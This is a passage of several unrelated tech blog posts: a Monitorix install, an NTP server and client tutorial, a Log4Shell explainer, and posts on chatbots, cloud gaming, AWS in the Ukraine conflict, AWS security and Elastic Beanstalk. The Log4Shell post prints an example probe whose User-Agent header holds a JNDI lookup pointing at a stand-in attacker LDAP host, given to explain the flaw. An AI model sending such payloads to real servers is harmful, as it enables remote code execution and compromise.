  • System load average and usage
  • Filesystem usage and I/O activity
  • Process statistics
  • Network traffic and usage
  • Netstat statistics
  • Network port traffic

Before installing Monitorix, set up the EPEL repository if it is not already installed.

yum -y install epel-release
yum -y install monitorix

We need to start the monitorix service.

service monitorix start

We can check the status of Monitorix with the following command:

service monitorix status

We need to allow port 8080 through the firewall; only then can we access the Monitorix dashboard from external machines.
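For example, on a system using firewalld (a sketch; adjust to iptables or your distribution’s firewall tool as needed):

firewall-cmd --permanent --add-port=8080/tcp
firewall-cmd --reload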

Access Monitorix

Open it through the browser at http://your-ip-address:8080

NTP servers and how to setup your own

What is NTP?

NTP stands for Network Time Protocol, and it is one of the oldest protocols still in use. It is a networking protocol used for clock synchronization among computer systems. It has been around since the 1980s; David L. Mills, a professor from the University of Delaware, is credited as the man who designed NTP.

NTP is most commonly associated with the client-server model, where the computers in a network are synchronized to within a few milliseconds of Coordinated Universal Time, commonly referred to as UTC. Synchronizing time is one of the fundamentals of any network, and hence NTP is a quintessential component in the modern computing world. Currently NTP is at its 4th version (NTPv4).

To better understand how NTP works here’s a guide to set up your own NTP host and clients.


Setup

In this project, we will be setting up a host server and a client that will connect to it.

In this case, we are using Ubuntu 18.04 LTS VMs for the setup.

Stage 1 : setting up your Host Server

Step 1

Update the repository

$ sudo apt-get update

Step 2

Install NTP server with apt-get

$ sudo apt-get install ntp

Verify the installation

$ sntp --version

Step 3

Open the configuration file and add the time server pools

$ sudo nano /etc/ntp.conf

We need to change the list of time server pools in this file.

In this case I’m choosing the India zone. Visit www.pool.ntp.org for the time server pools available for each region.

Step 4

Copy the pools and add them to the config file, like so:
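For example, with the India zone (the exact host names come from the pool.ntp.org zone you picked), the lines added to /etc/ntp.conf would look like:

pool 0.in.pool.ntp.org iburst
pool 1.in.pool.ntp.org iburst
pool 2.in.pool.ntp.org iburst
pool 3.in.pool.ntp.org iburst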

Quit using CTRL+X, followed by Y to save.

Step 5

Restart the NTP server

$ sudo service ntp restart

Then check NTP status

$ sudo service ntp status

Step 6
Configure firewall to allow clients to connect

$ sudo ufw allow from any to any port 123 proto udp

Stage 2 : Set up the client

Step 7

Install ntpdate on client

The ntpdate command will let you manually check your connection configuration with the NTP-server.

$ sudo apt-get install ntpdate

Step 8

Specify the IP address and hostname of the NTP host server in the client’s hosts file:

$ sudo nano /etc/hosts
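The added line pairs the host server’s address with a name the client can use in later steps (the IP below is a placeholder for your NTP host’s actual address):

192.168.1.10 NTP-server-host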

Step 9

Check if client time is synchronized with host

$ sudo ntpdate NTP-server-host

Step 10

Disable the systemd timesyncd service on the client

This is because we need our client to sync with our own NTP host instead:

$ sudo timedatectl set-ntp off

Step 11

Install NTP on the client

$ sudo apt-get install ntp

Step 12

Configure ntp.conf

$ sudo nano /etc/ntp.conf

Add the line server NTP-server-host prefer iburst at the end of the conf file, using the hostname you added to /etc/hosts.

Step 13

Restart the NTP service

$ sudo service ntp restart

Step 14

Check the synchronization status:

$ ntpstat

Host vs Client

We can see that the host and client are in sync.

Impact of Apache Log4j (Log4shell) Vulnerability

What is Apache Log4j?

Log4j is an open-source project managed by the Apache Software Foundation. Apache Log4j is a Java-based logging utility. Log4j Java library’s role is to log information that helps applications run smoothly, determine what’s happening, and help with the debugging process when errors occur.

What is Log4shell and How it Affected?

Log4Shell is a critical vulnerability affecting many versions of the Apache Log4j library. The vulnerability allows unauthenticated remote code execution: attackers can remotely run whatever code they want and gain access to all data on the affected machine. It also allows them to delete or encrypt all files on the affected machine and hold them for a ransom demand. This potentially makes a target of anything that uses a vulnerable version of Log4j to log user-controllable data. According to the Indian Computer Emergency Response Team (CERT-In), multiple vulnerabilities were reported in Apache Log4j which can be exploited by a remote attacker to execute arbitrary code or perform a denial-of-service attack on the targeted servers. Approximately 3 billion devices run Java, and Log4j can be found in many of those devices and applications, which makes this issue a high priority. The vulnerability was also found in products of famous technology vendors such as AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMware.

The Apache Log4j vulnerability has made global headlines since it was discovered in early December 2021. The issue mainly affects Apache Log4j 2 versions 2.0 to 2.14.1, and NIST published a critical CVE in the National Vulnerability Database on December 10th, 2021, naming it CVE-2021-44228 and assigning it the maximum severity score of 10.

Impact of Log4shell

Log files record and track computing events. They are extremely valuable in computing because they give system admins a way to track the operation of a system in order to spot problems and make corrections. Log files are important data points for security and surveillance, providing a full history of events over time. Beyond operating systems, log files are found in applications, web browsers, and hardware. With proper log file tracking, applications can either avoid or quickly rectify errors in their operating environment; smart tracking reduces downtime and minimizes the risk of lost data. Log data is typically sent to a secure collection point before further processing by system admins. From this it is clear how important log files are: they hold all the information about an application or system.

This is why the Log4Shell vulnerability is such a big threat. As mentioned, Log4j is a Java-based logging tool used to collect logs from the system, and because of this vulnerability it is easy for an attacker to compromise the system and get at its data.

How to overcome this?

Apache Log4j 2 versions 2.0 to 2.14.1 are the ones mainly affected by this vulnerability, so to fix the issue the user can upgrade Log4j to the latest patched version (2.16.0 or later). This removes the remote code execution risk.

The screenshot below is a list of the HTTP headers in a GET request that illustrates the attacker using interact.sh to probe for vulnerable servers.
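A simplified illustration of such a probe follows (both host names are placeholders): a vulnerable server that logs the User-Agent header would evaluate the JNDI lookup and reach out to the attacker-controlled LDAP server, which is the core of the Log4Shell flaw.

GET / HTTP/1.1
Host: victim.example.com
User-Agent: ${jndi:ldap://attacker.example.com/a}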

How chatbots improve customer experience

What is a chatbot?

A chatbot system uses AI (Artificial Intelligence) to chat with a user in natural language via messaging apps, Mobile apps, and Telephone.

One of the advantages of chatbots is that, unlike applications, they are not downloaded; it is not necessary to update them, and they do not take up space in the phone’s memory.

Benefits of using chatbots for customer experience

Customers want quick solutions to their problems. Some are used to the traditional way of phone support and therefore have a hard time accepting a chatbot, with the idea that it is a robotic interaction lacking a human touch. However, more customers are interested in using new technology, especially if it means a quick resolution to their issues.

Chatbots are automated programs that can simulate a human conversation. Chatbots use NLP (Natural Language Processing) to understand human conversations and to provide relevant answers to questions. From the customer’s point of view, they are talking to an actual person, or at least so it seems.

Open and closed chatbots

Depending on use cases chatbots can be either open or closed. Open chatbots are those which use AI to learn from their interaction with users.

Closed chatbots are those that only execute a script, and may or may not use AI depending on how they evaluate messages.

Few ways where we can improve customer experience

Reduce wait time

Bots can reduce customers’ wait time and get them where they want to be quicker.

Always on customer service

Chatbots never sleep; they offer 24/7 customer service support. Best-practice chatbots are trained using historical conversations.

Personalized human interaction

Computerized chatbots can help personalize the customer experience by drawing on a customer’s previous interactions.

Encourage employees

AI can support employees by freeing them to work on more challenging tasks. AI can mimic human behavior, and staff may fear that their jobs are at risk, but chatbots are a chance to help staff focus on high-value activities rather than routine daily tasks.

Cloud Gaming

Cloud gaming, unlike normal gaming, runs the game on on-demand servers. Normally, video games are played on a local system, where the game runs on a local device like a computer, smartphone, or video game console.

On a local system, the games need to be installed before we can play them. The games are stored locally, and some of them are very large, for example Call of Duty: Modern Warfare (231 GB), Quantum Break (178 GB), GTA 5 (72 GB), etc. These games require massive storage space, and some upcoming games are more than 1 TB.

Video games are graphics-heavy; to run a video game the system needs a GPU, and the more processing capability the graphics card has, the higher the video quality and the better the gameplay. Among the best graphics cards available are the Nvidia GeForce RTX 3080 and the AMD Radeon RX 6800 XT; these cards cost between 1.5 lakh and 2 lakh rupees, though there are some other options too.

Also, the processor plays a major role in a video game: the more powerful the processor, the smoother the gameplay. High-performance processors such as the Intel Core i9 or AMD Ryzen 9 are best for gaming.

Why cloud gaming?

Cloud gaming costs less compared to local gaming; for local gaming we need to buy or build a system, which is an expensive exercise. The parts in a gaming PC are very expensive, whereas for cloud gaming we just need a decent system that can connect to the internet. There is also no need to download the games; we just need to install the service provider’s software and pay for the game.

Cloud gaming is the best option for playing on a low-end device, because the local hardware is no longer the bottleneck.

How Cloud Gaming Works?

The games are stored and run on servers and controlled remotely; the video is streamed to the player. For cloud gaming, we need a high-speed internet connection with low latency. To access cloud games, we need client software.

The main cloud gaming services are:

  • NVIDIA GeForce Now
  • PlayStation Now
  • Google Stadia
  • Shadow

AWS and the Ukraine-Russia conflict

As the world comes to terms with the ongoing conflict between Russia and Ukraine following the declaration of war on the 24th of February, political and military spheres begin weighing their options, devising strategies and policy to take on the bear head on. The rest of the world looks on in horror and confusion as the chaos unfolds. Particularly interesting has been the stance taken by large tech companies. Their decision to cease operations and take a stand of non-cooperation was met with global praise. How large food conglomerates banded together to supply aid and how SpaceX-Starlink was able to set up satellite internet are highly commendable humanitarian efforts.

In the midst of all this chaos it may be a good idea to take a closer look at how AWS is coping with the challenges and playing its part in tightening the chokehold on Russia. According to some estimates, around 40% of the world’s internet traffic is handled by AWS, so it is worth examining closely how they cope with adversity and keep things ticking without missing a beat.

Let’s look at all the assets AWS has in Ukraine and Russia. Considering the general hostility of the region in recent decades AWS does not have any of its data centers in both countries. Apart from a few service desks in Ukraine there isn’t much of a presence or staff count. Since AWS is a company headquartered in the United States of America which always keeps a safe distance from Russia, AWS never officially started running operations or catered to the Russian Federation. In the wake of the conflict the US and its allies imposed sanctions and owing to the general policy many companies halted operations in Russia, some went as far as pulling out entirely.

AWS was the first of the big tech companies to announce their revised policy amidst the conflict: a strong condemnation of the violence and a new stance on the issue. AWS completely stopped new user registrations for Russians. While this is a seemingly strong statement, it wouldn’t affect current users on the cloud or their service. Azure and Google Cloud followed suit. In the aftermath of this policy change, not much changed in Russian cyberspace, though there were reports of online money exchanges going down and messaging services facing outages.

On a global level, an exponential rise in DDoS attacks is being reported, and Ukraine is not the only target; many Fortune 500 companies rely on Ukraine’s outsourced services, and those are taking a rough beating as well. With war being waged on all fronts, AWS and other cloud service providers are setting up countermeasures to track and neutralize threats such as the infamous HermeticWiper malware that is taking down financial institutions and government organizations.

It’s great to see big tech band together for the greater good and take a stand against bullying, bigotry, and violence. The almost Gandhian tactic of non-cooperation may not be enough on its own, but it is nevertheless an extra crack of the whip that hopefully stops the bear for good.

AWS Best Practices For Security

More professional industries are going online every day, which means that the demand for proper cybersecurity is at an all-time high. AWS security services may give near-limitless benefits to all elements of your business or organization. While AWS security can be managed by a third party, some things must be handled by us. 

Following a set of AWS security best practices will help guarantee that every component of your AWS services is as safe as possible and running as intended.

1. Multi-factor Authentication

Many people use the same password for all of their accounts, which can give attackers an easy way to compromise them, and even complex passwords can be compromised. So, in order to increase security, multi-factor authentication (MFA) is used.

We can say MFA is essentially a secondary credential that lives on a secondary device. So, when users need to log into their account, they need to use their primary password as well as their secondary device.

A secondary device can be in the form of a physical device as well as software. These devices provide time-based credentials that will be used to log into the account. With this, we can ensure that only the users with regulated equipment can access the network.

2. AWS Identity & Access Management

IAM is a service that can be used to create users, groups, and roles with separate permissions attached for each. Permissions are assigned by the administrator for each and every user or group.

IAM may also help with onboarding new workers because it allows them to be immediately allocated to a role or group depending on their department. The most significant advantage of IAM is that it allows us to rigorously monitor and regulate access to a network or services inside your organization.
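As a sketch of how this looks in practice with the AWS CLI (the group and user names are placeholders), an administrator might create a group, create a user, and place the user in that group so the group’s permissions apply:

$ aws iam create-group --group-name Developers
$ aws iam create-user --user-name alice
$ aws iam add-user-to-group --group-name Developers --user-name alice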

3. Data Backups

Data backup is common practice in most businesses, but how and when you save data may make a significant difference in damage mitigation and restoration timeframes. Planned data backups, like password reset schedules, give an extra degree of safety to your organization without interfering with regular operations.

A backup is only as valuable as the data it contains. If a large period of time elapses between a backup and a data loss, any material generated in that time is lost. By establishing frequent backups and defining a routine, you can assure minimum data loss and get back up and running as soon as feasible.

4. Managing Root Access

An AWS service account will have root credentials, which grant the most access to a network. One potential issue with this is that if those credentials are compromised, the entire network is at risk, and malevolent parties might obtain complete control of your network.

IAM can mitigate this risk by creating a top-level user account with the same capabilities as a root user, but with separate login credentials. As a result, if one type of top-level access is compromised, another is readily accessible to address the issue. MFA is another answer to this problem since it raises the difficulty of hacking login credentials tenfold.

5. Keep Policies Updated

Cloud services are always in use and might alter or be upgraded on a regular basis. It is critical for network security to keep your policies up to date with software or service updates. Updates and alterations can create weak points in a network, which if not handled, can lead to network breaches or the loss of sensitive data. Many rules will need to be modified in order to remain compliant with new legislation or AWS requirements. By keeping security policies up to date, you assure regulatory compliance and a greater degree of network security.

Deployment made easier with AWS Beanstalk

Revolutionary changes are being made in technology every day. Companies compete with each other to offer new and relevant services to their customers; they know very well that only by bringing in new and revolutionary changes can they stay in the industry, because every company faces tight and tough competition from its competitors and tries to grab the top position in the industry.

AWS is the most comprehensive and broadly adopted cloud platform. AWS provides a wide range of quality services to its customers, and these services help users deal with their various needs. Some of the main services provided by AWS are Amazon Elastic Compute Cloud (EC2), Amazon S3 (Simple Storage Service), Amazon Virtual Private Cloud (VPC), Amazon CloudFront, and Amazon Relational Database Service (RDS). In all, AWS provides 60+ services to its customers.

AWS Elastic Beanstalk is a service offered by Amazon Web Services for deploying applications; it orchestrates various AWS services, including EC2, S3, Simple Notification Service, CloudWatch, Auto Scaling, and Elastic Load Balancing. With Elastic Beanstalk, one can quickly deploy and manage applications in the AWS cloud without needing to learn about the infrastructure that runs those applications. We can directly upload our website code to Beanstalk, and it will automatically host the application for us with a URL, so we can concentrate on the code of our application rather than on the architecture it is hosted on. The other parts, from capacity provisioning, load balancing, and autoscaling to application health monitoring, are all handled by Elastic Beanstalk. Elastic Beanstalk supports applications developed in Go, Java, .NET, Node.js, PHP, Python, and Ruby. When you deploy your application, Elastic Beanstalk builds the selected supported platform version and provisions one or more AWS resources, such as Amazon EC2 instances, to run your application. Elastic Beanstalk is a PaaS offering used for deploying and scaling web applications and services developed with Java, .NET, PHP, and Node.js on familiar servers such as Apache, Nginx, Tomcat, and IIS. If you are building your own application with AWS Elastic Beanstalk, all you have to do is concentrate on writing code; the rest of the tasks, such as provisioning EC2 instances and Auto Scaling groups, maintaining security, and monitoring servers, storage, networking, virtualization, the operating system, and the database, are handled by Elastic Beanstalk. The main advantages of AWS Elastic Beanstalk are that it is highly scalable, fast and simple to get started with, offers quick deployment, supports multi-tenant architecture, is highly flexible, simplifies operations, and is cost-efficient.
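As a sketch of the workflow (assuming the Elastic Beanstalk CLI is installed; the application and environment names are placeholders), deploying a Node.js application can be as short as:

$ pip install awsebcli
$ eb init -p node.js my-app
$ eb create my-app-env
$ eb open

Here eb create provisions the load balancer, Auto Scaling group, and EC2 instances described below, and eb open opens the application’s URL in a browser.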

The following diagram shows an example Elastic Beanstalk architecture for a web server environment; it shows how the components in this environment work together.

The environment is the heart of the application. In the diagram, the environment is shown within the top-level solid line. When you create an environment, Elastic Beanstalk provisions the resources required to run your application. AWS resources created for an environment include one elastic load balancer (ELB in the diagram), an Auto Scaling group, and one or more Amazon Elastic Compute Cloud (Amazon EC2) instances.